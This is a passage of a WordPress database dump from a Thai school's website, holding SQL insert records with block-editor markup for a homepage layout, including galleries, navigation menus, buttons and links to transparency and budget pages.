src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-768x1024.jpg\" alt=\"\" class=\"wp-image-1328\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1329,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-1024x768.jpg\" alt=\"\" class=\"wp-image-1329\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','โครงการส่งเสริมการออกกำลังกายเพื่อสุขภาพที่ดีในโรงเรียน','','inherit','closed','closed','','1317-revision-v1','','','2025-06-09 14:22:55','2025-06-09 07:22:55','',1317,'http://pakhaeng.ssk.in.th/?p=1330',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1331,1,'2025-06-09 14:25:37','2025-06-09 07:25:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 